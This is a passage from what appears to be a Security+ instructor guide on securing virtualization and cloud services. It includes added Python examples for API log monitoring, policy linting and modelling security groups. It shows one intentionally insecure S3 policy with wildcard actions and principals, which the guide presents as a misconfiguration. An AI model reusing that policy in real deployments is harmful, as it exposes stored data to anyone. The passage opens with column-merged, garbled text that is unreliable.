they are particularly server. Having compromised the hypervisor, they could make a copy of your server
serious in a virtualized image and download it to any location. This would allow the attacker to steal any
environment. You can unencrypted data held on the e-commerce server. Even worse, it could conceivably
also point students to allow them to steal encrypted data, by obtaining the private encryption keys stored on
the following analysis the server or by sniffing unencrypted data or a data encryption key from the physical
of a typical VM escape
vulnerability: mcafee.
server's memory.
com/blogs/other- It is imperative to monitor security bulletins for the hypervisor software that you
blogs/mcafee-labs/
operate and to install patches and updates promptly. You should also design the
analyzing-patch-of-
a-virtual-machine- M architecture carefully so that the placement of Ms running di erent types of
escape-on-vmware. applications with di erent security re uirements does not raise unnecessary risks.


Preventing VM escaping is dependent on the virtualization vendor identifying security vulnerabilities in the hypervisor and on these being patched. The impact of VM escaping can be reduced by using effective service design and network placement when deploying VMs.

Collapsing zones to virtualized devices. This configuration is highly vulnerable to a VM escaping attack. (Images © 123RF.com.)

For example, when considering security zones such as a DMZ, VMs providing front-end and middleware/back-end services should be separated to different physical hosts. This reduces the security implications of a VM escaping attack on a host in the DMZ (which will generally be more vulnerable to such attacks).

Isolating VMs in different zones on separate hardware. This should reduce the impact of a VM escaping attack. (Images © 123RF.com.)

Show Slide(s): VM Sprawl Avoidance

VM Sprawl Avoidance

As well as securing the hypervisor, you must also treat each VM as you would any other network host. This means using security policies and controls to ensure the confidentiality, integrity, and availability of all data and services relying on host virtualization.


Each VM needs to be installed with its own security software suite to protect against
malware and intrusion attempts. Each guest must also have a patch management
process. This might mean installing updates locally or replacing the guest instance from
an updated VM template image.

Ordinary antivirus software installed on the host will NOT detect viruses infecting the guest
OS. Scanning the virtual disks of guest OSes from the host will cause serious performance
problems.

Although one of the primary benefits of virtualization is the ease of deploying new
systems, this type of system sprawl and deployment of undocumented assets can also
be the root of security issues. It will often be the case that a system will be brought up
for "just a minute" to test something, but languish for months or years, undocumented,
unsecured, and unpatched. Each of these undocumented systems could represent an
exploitable vulnerability. They increase the potential attack surface of the network.
Policies and procedures for tracking, securing, and, when no longer used, destroying
virtualized assets should be put in place and carefully enforced.
Virtual machine life cycle management (VMLM) software can be deployed to enforce
VM sprawl avoidance. VMLM solutions provide you with a centralized dashboard for
maintaining and monitoring all the virtual environments in your organization. More
generally, the management procedures for developing and deploying machine images
need to be tightly drafted and monitored. VMs should conform to an application-
specific template with the minimum configuration needed to run that application
(that is, not running unnecessary services). Images should not be run in any sort of
environment where they could be infected by malware or have any sort of malicious
code inserted. One of the biggest concerns here is of rogue developers or contractors
installing backdoors or "logic bombs" within a machine image. The problem of criminal
or disgruntled staff is obviously one that affects any sort of security environment, but
concealing code within VM machine images is a bit easier to accomplish and has the
potential to be much more destructive.


Review Activity:
Secure Cloud and Virtualization Services

Answer the following questions:

1. What is meant by a public cloud?

A solution hosted by a third party cloud service provider (CSP) and shared between
subscribers (multi-tenant). This sort of cloud solution has the greatest security
concerns.

2. What type of cloud solution would be used to implement a SAN?

This would usually be described as Infrastructure as a Service (IaaS).

3. What is a Type II hypervisor?

Software that manages virtual machines that has been installed to a guest OS. This is in
contrast to a Type I (or "bare metal") hypervisor, which interfaces directly with the host
hardware.

4. What is a VDE?

A Virtual Desktop Environment (VDE) is the workspace presented when accessing an
instance in a virtual desktop infrastructure (VDI) solution. VDI is the whole solution
(host server and virtualization platform, connection protocols, connection/session
broker, and client access devices).

5. What is the risk from a VM escaping attack?

VM escaping refers to attacking other guest OSes or the hypervisor or host from within
a virtual machine. Attacks may be to steal information, perform Denial of Service (DoS),
infect the system with malware, and so on.


Topic 15B
Apply Cloud Security Solutions

EXAM OBJECTIVES COVERED
1.2 Given a scenario, analyze potential indicators to determine the type of attack (Cloud-based versus on-premises only)
2.2 Summarize virtualization and cloud computing concepts
3.6 Given a scenario, apply cybersecurity solutions to the cloud

Teaching Tip: This topic focuses on objective 3.6, but does also cover some content from 2.2 (resource policies and transit gateways), and 1.2 (attack indicators).

Configuring cloud security solutions shares many principles and processes with on-premises security, but plenty of unfamiliar technologies and challenges too. Weak configuration of cloud services can make many attack vectors available, and the public nature of clouds means that they will quickly be discovered and exploited. You must be able to apply policies and technical controls to provision compute, network, and storage cloud resources with the attributes of confidentiality, integrity, and availability.

Show Slide(s): Cloud Security Integration and Auditing

Cloud Security Integration and Auditing

Teaching Tip: Discuss how on-premises monitoring and auditing can be extended to detect and prevent attacks in the cloud without having to provision separate dashboards and reporting.

Cloud-based services must be integrated within regular security policies and procedures and audited for compliance. Where indicators of on-premises attacks are found in local application logs and network traffic, indicators of cloud-based attacks are found in API logs and metrics. The same correlation to suspicious IP address ranges and domains and suspicious code strings must be made, but the source of this data is the cloud service provider (CSP). Accessing this auditing information in real time may be difficult, depending on the cloud service type. There are many cloud-based SIEM solutions that can perform this collection, aggregation, and correlation of security data from both on-premises and cloud-based networks and instances.

As with any contracted service, cloud computing is a means of transferring risk. As such, it is imperative to identify precisely which risks you are transferring, to identify which responsibilities the service provider is undertaking, and to identify which responsibilities remain with you. This should be set out in a service level agreement (SLA) with a responsibility matrix. For example, in an SaaS solution, the provider may be responsible for the confidentiality, integrity, and availability of the software. They would be responsible for configuring a fault tolerant, clustered server service; for firewalling the servers and creating proper authentication, authorization, and accounting procedures; for scanning for intrusions and monitoring network logs, applying OS and software patches; and so on. You might or might not be responsible for some or all of the software management functions, though—ensuring that administrators and users practice good password management, configuring system privileges, making backups of data, and so on.
Where critical tasks are the responsibility of the service provider, you should try to ensure that there is a reporting mechanism to show that these tasks are being completed, that their disaster recovery plans are effective, and so on.
Another proviso is that your company is likely to still be directly liable for serious security breaches; if customer data is stolen, for instance, or if your hosted website is hacked and used to distribute malware. You still have liability for legal and regulatory requirements. You might be able to sue the service provider for damages, but your company would still be the point of investigation. You may also need to consider the legal implications of using a cloud provider if its servers are located in a different country.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 419

You must also consider the risk of insider threat, where the insiders are administrators working for the service provider. Without effective security mechanisms such as separation of duties and M of N control, it is highly likely that they would be able to gain privileged access to your data. Consequently, the service provider must be able to demonstrate to your satisfaction that they are prevented from doing so. There is also the risk described earlier that your data is in proximity to other, unknown virtual servers and that some sort of attack could be launched on your data from another virtual server.

The Twitter hack affecting high-profile accounts being hijacked for a bitcoin scam is a good illustration of the risks from insider threat (scmagazine.com/home/security-news/insider-threats/twitter-hack-is-a-reminder-of-the-dangers-of-unfettered-employee-access).

As with any contracted service, with any SaaS solution, you place a large amount of trust in the service provider. The more important the service is to your business, the more risk you are investing in that trust relationship.

Show Slide(s): Cloud Security Controls

Cloud Security Controls

Teaching Tip: Highlight the similarities to on-premises security tasks.

Clouds use the same types of security controls as on-premises networks, including identity and access management (IAM), endpoint protection (for virtual instances), resource policies to govern access to data and services, firewalls to filter traffic between hosts, and logging to provide an audit function.
Most CSPs will provide these security controls as native functionality of the cloud platform. Google's firewall service is an example of this type of cloud-native control (cloud.google.com/firewalls). The controls can be deployed and configured using either the CSP's web console, or programmatically via a command line interface (CLI) or application programming interface (API). A third-party solution would typically be installed as a virtual instance within the cloud. For example, you might prefer to run a third-party next-generation firewall. This can be configured as an appliance and deployed to the cloud. The virtual network architecture can be defined so that this appliance instance is able to inspect traffic and apply policies to it, either by routing the traffic through the instance or by using some type of bridging or mirroring. As an example, consider the configuration guide for the Barracuda next-gen firewall (campus.barracuda.com/product/cloudgenfirewall/doc/overview).
The same considerations can be made for other types of security controls—notably data loss prevention and compliance management. Cloud-native controls might not exist for these use cases, they might not meet the functional requirements that third-party solutions can, and there may be too steep a transition in terms of change management and skills development.

Application Security and IAM


Application security in the cloud refers both to the software development process and
to identity and access management (IAM) features designed to ensure authorized use
of applications.
Just as with on-premises solutions, cloud-based IAM enables the creation of user and
user security groups, plus role-based management of privileges.

Secrets Management
A cloud service is highly vulnerable to remote access. A failure of credential
management is likely to be exploited by malicious actors. You must enforce strong
authentication policies to mitigate risks:
• Do not use the root user for the CSP account for any day-to-day logon activity.


• Require strong multifactor authentication (MFA) for interactive logons. Use conditional authentication to deny or warn of risky account activity.

• Principals—user accounts, security groups, roles, and services—can interact with cloud services via CLIs and APIs. Such programmatic access is enabled by assigning a secret key to the account. Only the secret key (not the ordinary account credential) can be used for programmatic access. When a secret key is generated for an account, it must immediately be transferred to the host and kept securely on that host.

Show Slide(s): Cloud Compute Security

Cloud Compute Security

Teaching Tip: Generally, container security will be the responsibility of the CSP, unless operating a private cloud, while API use counts as security in the cloud.

Cloud provides resources abstracted from physical hardware via one or more layers of virtualization. The compute component provides process and system memory (RAM) resource as required for a particular workload. The workload could be a virtual machine instance configured with four CPUs and a set amount of RAM, or it could be a container instance spun up to perform a function and return a result within a given timeframe. The virtualization layer ensures that the resources required for this task are made available on-demand. This can be referred to as dynamic resource allocation. It will be the responsibility of the CSP to ensure this capability is met to the standards agreed in the SLA.

Within the compute component, the following critical security considerations can be identified.

Container Security
A container uses many shared components on the underlying platform, meaning it
must be carefully configured to reduce the risk of data exposure. In a container engine
such as Docker, each container is isolated from others through separate namespaces
and control groups (docs.docker.com/engine/security/security). Namespaces prevent
one container reading or writing processes in another, while control groups ensure
that one container cannot overwhelm others in a DoS-type attack.

API Inspection and Integration

The API is the means by which consumers interact with the cloud infrastructure,
platform, or application. The consumer may use direct API calls, or may use a CSP-
supplied web console as a graphical interface for the API. Monitoring API usage
gives warning if the system is becoming overloaded (ensuring availability) and allows
detection of unauthorized usage or attempted usage.
• Number of requests—this basic load metric counts number of requests per
second or requests per minute. Depending on the service type, you might be able
to establish baselines for typical usage and set thresholds for alerting abnormal
usage. An unexplained spike in API calls could be an indicator of a DDoS attack, for
instance.

• Latency—this is the time in milliseconds (ms) taken for the service to respond to an API call. This can be measured for specific services or as an aggregate value across all services. High latency usually means that compute resources are insufficient. The cause of this could be genuine load or DDoS, however.

• Error rates—this measures the number of errors as a percentage of total calls, usually classifying error types under category headings. Errors may represent an overloaded system if the API is unresponsive, or a security issue, if the errors are authorization/access denied types.


• Unauthorized and suspicious endpoints—connections to the API can be managed in the same sort of way as remote access. The client endpoint initiating the connection can be restricted using an ACL and the endpoint's IP address monitored for geographic location.
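The four API indicators listed above can be computed mechanically from an access log. The following Python script is an added example written for this guide (not code from the guide or from any CSP): it parses a constructed log, whose line format, allow-listed source range and alert thresholds are all assumptions, and returns one alert per indicator that crosses its threshold.

```python
"""Checks over cloud API access logs for the four indicators discussed above.

Added example for this guide; not code from the guide or from any CSP.
The log format and thresholds are assumptions; real CSP API logs have
their own schemas.
"""
from collections import Counter, defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network
from statistics import mean

# Constructed sample log: ISO timestamp, caller IP, principal, API action,
# HTTP status, latency in ms.  Real entries would come from the CSP.
SAMPLE_LOG = """\
2021-08-30T10:00:01Z 203.0.113.10 ops-role ListObjects 200 42
2021-08-30T10:00:05Z 203.0.113.10 ops-role GetObject 200 51
2021-08-30T10:00:09Z 203.0.113.11 ci-role PutObject 200 880
2021-08-30T10:00:12Z 198.51.100.7 ops-role GetObject 403 30
2021-08-30T10:00:13Z 198.51.100.7 ops-role GetObject 403 29
2021-08-30T10:00:14Z 198.51.100.7 ops-role ListBuckets 403 31
2021-08-30T10:01:02Z 203.0.113.10 ops-role GetObject 200 47
2021-08-30T10:01:30Z 203.0.113.11 ci-role PutObject 503 1900
"""

ALLOWED_SOURCES = [ip_network("203.0.113.0/24")]  # assumed corporate egress range


def parse_log(text):
    """Parse log lines into dicts; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, principal, action, status, latency = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "ip": ip, "principal": principal, "action": action,
            "status": int(status), "latency_ms": int(latency),
        })
    return events


def requests_per_minute(events):
    """Number of requests: count of calls per one-minute bucket."""
    return dict(Counter(e["ts"].strftime("%Y-%m-%dT%H:%M") for e in events))


def latency_summary(events):
    """Latency: mean and maximum response time per API action."""
    per_action = defaultdict(list)
    for e in events:
        per_action[e["action"]].append(e["latency_ms"])
    return {a: {"mean": mean(v), "max": max(v)} for a, v in per_action.items()}


def error_rates(events):
    """Error rate: percentage of calls per status class (4xx = access, 5xx = server)."""
    total = len(events)
    classes = Counter(f"{e['status'] // 100}xx" for e in events)
    return {cls: round(100 * n / total, 1) for cls, n in classes.items()}


def suspicious_endpoints(events, allowed=ALLOWED_SOURCES):
    """Unauthorized endpoints: caller IPs outside the allow-list and how often they were denied."""
    findings = defaultdict(lambda: {"calls": 0, "denied": 0})
    for e in events:
        addr = ip_address(e["ip"])
        if any(addr in net for net in allowed):
            continue
        findings[e["ip"]]["calls"] += 1
        if e["status"] in (401, 403):
            findings[e["ip"]]["denied"] += 1
    return dict(findings)


def alerts(events, rpm_threshold=5, latency_ms_threshold=1000, error_pct_threshold=25.0):
    """Combine the four metrics into alert strings; thresholds are assumed baselines."""
    out = []
    for minute, n in requests_per_minute(events).items():
        if n > rpm_threshold:
            out.append(f"spike: {n} requests in {minute}")
    for action, stats in latency_summary(events).items():
        if stats["max"] > latency_ms_threshold:
            out.append(f"latency: {action} max {stats['max']} ms")
    rates = error_rates(events)
    for cls in ("4xx", "5xx"):
        if rates.get(cls, 0) > error_pct_threshold:
            out.append(f"errors: {cls} at {rates[cls]}% of calls")
    for ip, f in suspicious_endpoints(events).items():
        out.append(f"endpoint: {ip} outside allow-list ({f['denied']} of {f['calls']} calls denied)")
    return out


if __name__ == "__main__":
    for line in alerts(parse_log(SAMPLE_LOG)):
        print(line)
```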

Instance Awareness
As with on-premises virtualization, it is important to manage instances (virtual
machines and containers) to avoid sprawl, where undocumented instances are
launched and left unmanaged. As well as restricting rights to launch instances, you
should configure logging and monitoring to track usage.

Show Slide(s): Cloud Storage Security

Cloud Storage Security

Teaching Tip: Make sure students can recognize a JSON format resource policy.

Where the compute component refers to CPU and system memory resources, the storage component means the provisioning of persistent storage capacity. As with the compute component, the cloud virtualization layer abstracts the underlying hardware to provide the required storage type, such as a virtual hard disk for a VM instance, object-based storage to serve static files in a web application, or block storage for use by a database server. Storage profiles will have different performance characteristics for different applications, such as fast SSD-backed storage for databases versus slower HDD-backed media for archiving. The principal performance metric is the number of input/output operations per second (IOPS) supported.

Permissions and Resource Policies

As with on-premises systems, cloud storage resources must be configured to allow reads and/or writes only from authorized endpoints. In the cloud, a resource policy acts as the ACL for an object. In a resource policy, permissions statements are typically written as JavaScript Object Notation (JSON) strings. Misconfiguration of these resource policies is a widely exploited attack vector. For example, the following policy uses the "any" wildcard (*) to assign both actions (read and write) and principals (accounts) to a storage object. This type of policy breaks the principle of least privilege and is highly unsecure:

"Statement": [ {
    "Action": [
        "*"
    ],
    "Effect": "Allow",
    "Principal": "*",
    "Resource": "arn:aws:s3:::515support-courses-data/*"
} ]
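A wildcard statement like the one above can be caught before it is deployed with a simple policy lint. The following Python is an added example for this guide, not code from the guide or from AWS: it wraps the statement above in a complete policy document, places a least-privilege counterpart beside it (the account ID and role name in that counterpart are placeholders), and flags any Allow statement whose Principal or Action is a wildcard.

```python
"""Lint a storage resource policy for the wildcard misconfiguration shown above.

Added example for this guide, not code from the guide or from AWS.  The
policy documents are constructed; the account ID and role name in the
tightened policy are placeholders.
"""
import json

# The over-permissive statement from the text, wrapped in a complete policy
# document ("Version" is the standard policy-language version string).
OPEN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Action": ["*"],
        "Effect": "Allow",
        "Principal": "*",
        "Resource": "arn:aws:s3:::515support-courses-data/*",
    }],
})

# A least-privilege counterpart (constructed): one named principal, read-only.
TIGHT_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "CourseDataReadOnly",
        "Effect": "Allow",
        # placeholder account ID and role name
        "Principal": {"AWS": "arn:aws:iam::111122223333:role/course-web"},
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::515support-courses-data/*",
    }],
})


def _as_list(value):
    """Policy elements may be a single string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _principals(principal):
    """Flatten the Principal element: "*" or a map such as {"AWS": ...}."""
    if isinstance(principal, dict):
        out = []
        for v in principal.values():
            out.extend(_as_list(v))
        return out
    return _as_list(principal)


def _is_wild(action):
    """Both "*" and service-wide forms such as "s3:*" grant every action in scope."""
    return action == "*" or action.endswith(":*")


def lint_policy(policy_json):
    """Return one finding per Allow statement that uses a wildcard principal or action.

    A finding records which elements are wildcards and whether write access
    is granted, so a reviewer can judge read versus write exposure.
    """
    policy = json.loads(policy_json)
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # a Deny with wildcards restricts access; it is not a risk
        actions = _as_list(stmt.get("Action"))
        principals = _principals(stmt.get("Principal"))
        wild_principal = any(p == "*" for p in principals)  # also catches {"AWS": "*"}
        wild_action = any(_is_wild(a) for a in actions)
        writes = [a for a in actions
                  if _is_wild(a) or a.split(":")[-1].startswith(("Put", "Delete"))]
        if wild_principal or wild_action:
            findings.append({
                "statement": idx,
                "sid": stmt.get("Sid"),
                "anonymous_principal": wild_principal,
                "all_actions": wild_action,
                "grants_write": bool(writes),
                "resource": _as_list(stmt.get("Resource")),
            })
    return findings


def is_least_privilege(policy_json):
    """True when no Allow statement uses a wildcard principal or action."""
    return not lint_policy(policy_json)


if __name__ == "__main__":
    print("open policy findings:", json.dumps(lint_policy(OPEN_POLICY), indent=2))
    print("tight policy least privilege:", is_least_privilege(TIGHT_POLICY))
```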
Encryption
Cloud storage encryption equates to the on-premises concept of full disk encryption
(FDE). The purpose is to minimize the risk of data loss via an insider or intruder attack
on the CSP's storage systems. Each storage unit is encrypted using an AES key. If an
attacker were to physically access a data center and copy or remove a disk, the data on
the disk would not be readable.


To read or write the data, the AES key must be available to the VM or container using
the storage object. With CSP-managed keys, the cloud provider handles this process
by using the access control rights configured on the storage resource to determine
whether access is approved and, if so, making the key available to the VM or container.
The key will be stored in a hardware security module (HSM) within the cloud. The HSM
and separation of duties policies protect the keys from insider threat. Alternatively,
customers can manage keys themselves, taking on all responsibility for secure
distribution and storage.
Encryption can also be applied at other levels. For example, applications can selectively
encrypt file system objects or use database-level encryption to encrypt fields and/or
records. All networking—whether customer to cloud or between VMs/containers within
the cloud—should use encrypted protocols such as HTTPS or IPSec.

Show Slide(s): High Availability

High Availability

Teaching Tip: Note that we will return to availability in the lesson on cybersecurity resiliency.

One of the benefits of the cloud is the potential for providing services that are resilient to failures at different levels, such as component, server, local network, site, data center, and wide area network. The CSP uses a virtualization layer to ensure that compute, storage, and network provision meet the availability criteria set out in its SLA. In terms of storage performance tiers, high availability (HA) refers to storage provisioned with a guaranteed uptime percentage or better. As with on-premises architecture, the CSP uses redundancy to make multiple disk controllers and storage devices available to a pool of storage resource. Data may be replicated between pools or groups, with each pool supported by separate hardware resources.

Replication
Data replication allows businesses to copy data to where it can be utilized most effectively. The cloud may be used as a central storage area, making data available among all business units. Data replication requires low latency network connections, security, and data integrity. CSPs offer several data storage performance tiers (cloud.google.com/storage/docs/storage-classes). The terms hot and cold storage refer to how quickly data is retrieved. Hot storage retrieves data more quickly than cold, but the quicker the data retrieval, the higher the cost. Different applications have diverse replication requirements. A database generally needs low-latency, synchronous replication, as a transaction often cannot be considered complete until it has been made on all replicas. A mechanism to replicate data files to backup storage might not have such high requirements, depending on the criticality of the data.

High Availability across Zones

CSPs divide the world into regions. Each region is independent of the others. The regions are divided into availability zones. The availability zones have independent data centers with their own power, cooling, and network connectivity. You can choose to host data, services, and VM instances in a particular region to provide a lower latency service to customers. Provisioning resources in multiple zones and regions can also improve performance and increases redundancy, but requires an adequate level of replication performance.
Consequently, CSPs offer several tiers of replication representing different high availability service levels:
• Local replication—replicates your data within a single data center in the region where you created your storage account. The replicas are often in separate fault domains and upgrade domains.

• Regional replication (also called zone-redundant storage)—replicates your data across multiple data centers within one or two regions. This safeguards data and access in the event a single data center is destroyed or goes offline.


• Geo-redundant storage (GRS)—replicates your data to a secondary region that is distant from the primary region. This safeguards data in the event of a regional outage or a disaster.

Show Slide(s): Cloud Networking Security

Cloud Networking Security

Teaching Tip: Note that VPC is synonymous with virtual network.

Within the cloud, the CSP establishes a virtualization layer that abstracts the underlying physical network. This allows the CSP to operate a public cloud where the networking performed by each customer account is isolated from the others. In terms of customer-configured cloud networking, there are various contexts:
• Networks by which the cloud consumer operates and manages the cloud systems.

• Virtual networks established between VMs and containers within the cloud.

• Virtual networks by which cloud services are published to guests or customers on the Internet.

Virtual Private Clouds (VPCs)

Each customer can create one or more virtual private clouds (VPCs) attached to their account. By default, a VPC is isolated from other CSP accounts and from other VPCs operating in the same account. This means that customer A cannot view traffic passing over customer B's VPC. The workload for each VPC is isolated from other VPCs. Within the VPC, the cloud consumer can assign an IPv4 CIDR block and configure one or more subnets within that block. Optionally, an IPv6 CIDR block can be assigned also.

The following notes focus on features of networking in AWS. Other vendors support similar functionality, though sometimes with different terminology. For example, in Microsoft Azure, VPCs are referred to as virtual networks.

Public and Private Subnets

Each subnet within a VPC can either be private or public. To configure a public subnet, first an Internet gateway (virtual router) must be attached to the VPC configuration. Secondly, the Internet gateway must be configured as the default route for each public subnet. If a default route is not configured, the subnet remains private, even if an Internet gateway is attached to the VPC. Each instance in the subnet must also be configured with a public IP in its cloud profile. The Internet gateway performs network address translation (NAT) to route Internet communications to and from the instance.

The instance network adapter is not configured with this public IP address. The instance's NIC is configured with an IP address for the subnet. The public address is used by the virtualization management layer only. Public IP addresses can be assigned from your own pool or from a CSP-managed service, such as Amazon's Elastic IP (docs.aws.amazon.com/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html).

There are other ways to provision external connectivity for a subnet if it is not
appropriate to make it public:
• NAT gateway—this feature allows an instance to connect out to the Internet or to
other AWS services, but does not allow connections initiated from the Internet.

• VPN—there are various options for establishing connections to and between VPCs
using virtual private networks (VPNs) at the software layer or using CSP-managed
features.


Show Slide(s): VPCs and Transit Gateways

VPCs and Transit Gateways

Routing can be configured between subnets within a VPC. This traffic can be subject to cloud-native ACLs allowing or blocking traffic on the basis of host IPs and ports. Alternatively, traffic could be routed through a virtual firewall instance, or other security appliance.
Connectivity can also be configured between VPCs in the same account or with VPCs belonging to different accounts, and between VPCs and on-premises networks. Configuring additional VPCs rather than subnets within a VPC allows for a greater degree of segmentation between instances. A complex network might split segments between different VPCs across different cloud accounts for performance or compliance reasons.
Traditionally, VPCs can be interconnected using peering relationships and connected with on-premises networks using VPN gateways. These one-to-one VPC peering relationships can quickly become difficult to manage, especially if each VPC must interconnect in a mesh-like structure. A transit gateway is a simpler means of managing these interconnections. Essentially, a transit gateway is a virtual router that handles routing between the subnets in each attached VPC and any attached VPN gateways (aws.amazon.com/transit-gateway).

Amazon's white paper sets out options for configuring multi-VPC infrastructure in more detail (d1.awsstatic.com/whitepapers/building-a-scalable-and-secure-multi-vpc-aws-network-infrastructure.pdf).

Show Slide(s): VPC Endpoints

VPC Endpoints

A VPC endpoint is a means of publishing a service so that it is accessible by instances in other VPCs using only the AWS internal network and private IP addresses (d1.awsstatic.com/whitepapers/aws-privatelink.pdf). This means that the traffic is never exposed to the Internet. There are two types of VPC endpoint: gateway and interface.

Gateway Endpoints
A gateway endpoint is used to connect instances in a VPC to the AWS S3 storage and DynamoDB database services. A gateway endpoint is configured as a route to the service in the VPC's route table.

Interface Endpoints
An interface endpoint makes use of AWS's PrivateLink feature to allow private access to custom services:
• A custom service provider VPC is configured by publishing the service with a DNS host name. Alternatively, the service provider might be an Amazon default service that is enabled as a VPC interface endpoint, such as CloudWatch Events/Logs.

• A VPC endpoint interface is configured in each service consumer VPC subnet. The VPC endpoint interface is configured with a private IP address within the subnet plus the DNS host name of the service provider.

• Each instance within the VPC subnet is configured to use the endpoint address to contact the service provider.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B


Cloud Firewall Security

As in an on-premises network, a firewall determines whether to accept or deny/discard
incoming and outgoing traffic. Firewalls work with multiple accounts, VPCs, subnets
within VPCs, and instances within subnets to enforce the segmentation required by
the architectural design. Segmentation may be needed for many different reasons,
including separating workloads for performance and load balancing, keeping data
processing within an isolated segment for compliance with laws and regulations,
and compartmentalizing data access and processing for different departments or
functional requirements.
Filtering decisions can be made based on packet headers and payload contents at
various layers, identified in terms of the OSI model:
• Network layer (layer 3): the firewall accepts or denies connections on the basis of
IP addresses or address ranges and TCP/UDP port numbers (the latter are actually
contained in layer 4 headers, but this functionality is still always described as basic
layer 3 packet filtering).

• Transport layer (layer 4): the firewall can store connection states and use rules to
allow established or related traffic. Because the firewall must maintain a state table
of existing connections, this requires more processing power (CPU and memory).

• Application layer (layer 7): the firewall can parse application protocol headers
and payloads (such as HTTP packets) and make filtering decisions based on their
contents. This requires even greater processing capacity (or load balancing), or the
firewall will become a bottleneck and increase network latency.

While you can use cloud-based firewalls to implement on-premises network security,
here we are primarily concerned with the use of firewalls to filter traffic within and to
and from the cloud itself. Such firewalls can be implemented in several ways to suit
different purposes:
• As software running on an instance. This sort of host-based firewall is identical
to ones that you would configure for an on-premises host. It could be a stateful
packet filtering firewall or a web application firewall (WAF) with a ruleset tuned to
preventing malicious attacks. The drawback is that the software consumes instance
resources and so is not very efficient. Also, managing the rulesets across many
instances can be challenging.

• As a service at the virtualization layer to filter traffic between VPC subnets and
instances. This equates to the concept of an on-premises network firewall.

Native cloud application-aware firewalls incur transaction costs, typically calculated on
time deployed and traffic volume. These costs might be a reason to choose a third-party
solution instead of the native control.

Security Groups

In AWS, basic packet filtering rules managing traffic that each instance will accept can
be managed through security groups (docs.aws.amazon.com/vpc/latest/userguide/
VPC_SecurityGroups.html). A security group provides stateful inbound and outbound
filtering at layer 4. The stateful filtering property means that it will allow established
and related traffic if a new connection has been accepted.
The default security group allows any outbound traffic and any inbound traffic from
instances also bound to the default security group. A custom security group sets the
ports and endpoints that are allowed for inbound and outbound traffic. There are
no deny rules for security groups; any traffic that does not match an allow rule is
dropped. Consequently, a custom group with no rules drops all network traffic. Note
that AWS adds an allow-all outbound rule to every newly created custom group, so a
group only blocks all egress once that rule has been removed.

Teaching Tip: A security group is a collection of firewall rules that can be applied to one or
more instances, working like a virtual host firewall.


Multiple instances can be assigned to the same security group, and instances within
the same subnet can be assigned to different security groups. You can assign multiple
security groups to the same instance. You can also assign security groups to VPC
endpoint interfaces.

Adding a custom security group when launching a new instance in AWS EC2. This policy allows SSH
access from a single IP address (redacted) and access to HTTPS from any IP address.

Most cloud providers support similar filtering functionality, though they may be
implemented differently. For example, in Azure, network security groups can be
applied to network interfaces or to subnets (docs.microsoft.com/en-us/azure/virtual-
network/security-overview). Unlike AWS security groups, Azure network security groups
use prioritized rules that can explicitly deny traffic as well as allow it.
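The following Python model is added here for illustration; it is not part of the original guide and not AWS code. It encodes the security group behaviour just described so that it can be exercised offline: allow-only rules, stateful handling of reply traffic, group-referencing sources as used by the default group, and the drop of anything unmatched. The inbound policy is the one shown in the figure above (SSH from one address, HTTPS from anywhere); the addresses, group identifiers, and the HTTPS-only egress rule are constructed for the example.

```python
"""Model of AWS-style security group semantics (added illustration, not AWS code).

Rules are allow-only; there is no deny rule. Filtering is stateful: once a
connection is accepted in one direction, its return traffic is allowed in the
other without needing a rule. A rule may name another group as its source,
which is how the default group lets its members talk to each other.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Rule:
    protocol: str    # "tcp", "udp", or "-1" for all protocols (ports then ignored)
    from_port: int
    to_port: int
    source: str      # a CIDR such as "203.0.113.7/32", or a group id such as "sg-default"


@dataclass
class SecurityGroup:
    group_id: str
    inbound: list = field(default_factory=list)
    outbound: list = field(default_factory=list)


@dataclass(frozen=True)
class Packet:
    direction: str   # "in" or "out", relative to the protected instance
    protocol: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int


def rule_matches(rule, protocol, port, peer_ip, membership):
    """True if the rule allows `protocol` traffic on `port` to/from `peer_ip`."""
    if rule.protocol != "-1":
        if rule.protocol != protocol or not (rule.from_port <= port <= rule.to_port):
            return False
    if rule.source.startswith("sg-"):
        # Group-referencing rule: the peer must itself belong to that group.
        return rule.source in membership.get(peer_ip, set())
    return ip_address(peer_ip) in ip_network(rule.source, strict=False)


class StatefulFilter:
    """Enforces the union of the attached groups' rules for one instance."""

    def __init__(self, groups, membership):
        self.groups = groups          # SecurityGroup objects attached to the instance
        self.membership = membership  # {peer_ip: {group ids}} for other instances
        self.state = set()            # accepted flows as (proto, src, sport, dst, dport)

    def evaluate(self, pkt):
        # Stateful: reply traffic for an accepted flow passes without a matching rule.
        if (pkt.protocol, pkt.dst_ip, pkt.dst_port, pkt.src_ip, pkt.src_port) in self.state:
            return True
        if pkt.direction == "in":
            rules, peer = [r for g in self.groups for r in g.inbound], pkt.src_ip
        else:
            rules, peer = [r for g in self.groups for r in g.outbound], pkt.dst_ip
        if any(rule_matches(r, pkt.protocol, pkt.dst_port, peer, self.membership) for r in rules):
            self.state.add((pkt.protocol, pkt.src_ip, pkt.src_port, pkt.dst_ip, pkt.dst_port))
            return True
        return False  # no deny rules exist: unmatched traffic is simply dropped


# Constructed policy matching the figure: SSH from one admin address, HTTPS from anywhere.
# The default allow-all outbound rule has been removed in favour of HTTPS-only egress.
WEB_SG = SecurityGroup(
    "sg-web",
    inbound=[Rule("tcp", 22, 22, "203.0.113.7/32"), Rule("tcp", 443, 443, "0.0.0.0/0")],
    outbound=[Rule("tcp", 443, 443, "0.0.0.0/0")],
)
# Approximation of the AWS default group: members may talk to each other; all egress allowed.
DEFAULT_SG = SecurityGroup(
    "sg-default",
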